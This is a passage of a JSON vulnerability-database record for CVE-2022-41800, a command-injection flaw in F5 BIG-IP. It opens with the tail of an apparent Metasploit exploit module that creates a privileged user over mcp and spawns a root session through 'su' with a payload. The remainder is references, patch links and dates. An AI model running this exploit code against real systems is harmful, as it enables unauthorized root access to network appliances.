mcp_build(\u0027userdb_entry_is_system\u0027, \u0027ulong\u0027, 0),\n mcp_build(\u0027userdb_entry_shell\u0027, \u0027string\u0027, \u0027/bin/bash\u0027),\n mcp_build(\u0027userdb_entry_is_crypted\u0027, \u0027ulong\u0027, 1),\n mcp_build(\u0027userdb_entry_passwd\u0027, \u0027string\u0027, hashed_password),\n ])\n ]),\n\n # Finish the transaction\n mcp_build(\u0027end_transaction\u0027, \u0027structure\u0027, [])\n ])\n\n # Handle errors\n if result.nil?\n fail_with(Failure::Unknown, \u0027Request to mcp appeared to fail\u0027)\n end\n\n # The only result we really care about is an error\n error_returned = false\n result.each do |r|\n result = mcp_get_single(r, \u0027result\u0027)\n result_code = mcp_get_single(result, \u0027result_code\u0027)\n\n # If there\u0027s no code or it\u0027s zero, just ignore it\n if result_code.nil? || result_code == 0\n next\n end\n\n # If we\u0027re here, an error was returned!\n error_returned = true\n\n # Otherwise, try and get result_message\n result_message = mcp_get_single(result, \u0027result_message\u0027)\n if result_message.nil?\n print_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\")\n else\n print_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\")\n end\n end\n\n # Let them know if it likely worked\n if !error_returned\n print_good(\"Service didn\u0027t return an error, so user was likely created!\")\n\n if datastore[\u0027CREATE_SESSION\u0027]\n print_status(\u0027Attempting create a root session...\u0027)\n\n out = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\")\n\n vprint_status(\"Output from su command: #{out}\")\n end\n end\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "PACKETSTORM",
"id": "170847"
}
],
"trust": 1.89
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-438078",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-41800",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "170847",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170008",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5995",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-438078",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169967",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-41800",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "PACKETSTORM",
"id": "170847"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"id": "VAR-202211-1118",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T15:11:12.151000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "K13325942",
"trust": 0.8,
"url": "https://support.f5.com/csp/article/K13325942"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.1
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://support.f5.com/csp/article/k13325942"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41800"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170847/f5-big-ip-create-administrative-user.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/f5-big-ip-privilege-escalation-via-icontrol-rest-39928"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170008/f5-big-ip-icontrol-remote-command-execution.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5995"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-41800/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/169967/f5-big-ip-icontrol-cross-site-request-forgery.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41622"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/"
},
{
"trust": 0.1,
"url": "https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://support.f5.com/csp/article/k97843387"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://github.com/rbowes-r7/refreshing-mcp-tool"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "PACKETSTORM",
"id": "170847"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "PACKETSTORM",
"id": "170847"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-438078"
},
{
"date": "2023-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"date": "2023-02-03T14:49:22",
"db": "PACKETSTORM",
"id": "170847"
},
{
"date": "2022-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"date": "2022-12-07T04:15:10.480000",
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-12T00:00:00",
"db": "VULHUB",
"id": "VHN-438078"
},
{
"date": "2023-11-28T07:02:00",
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"date": "2023-02-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"date": "2023-11-07T03:53:00.727000",
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection vulnerability in multiple F5 Networks products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
}
],
"trust": 0.6
}
}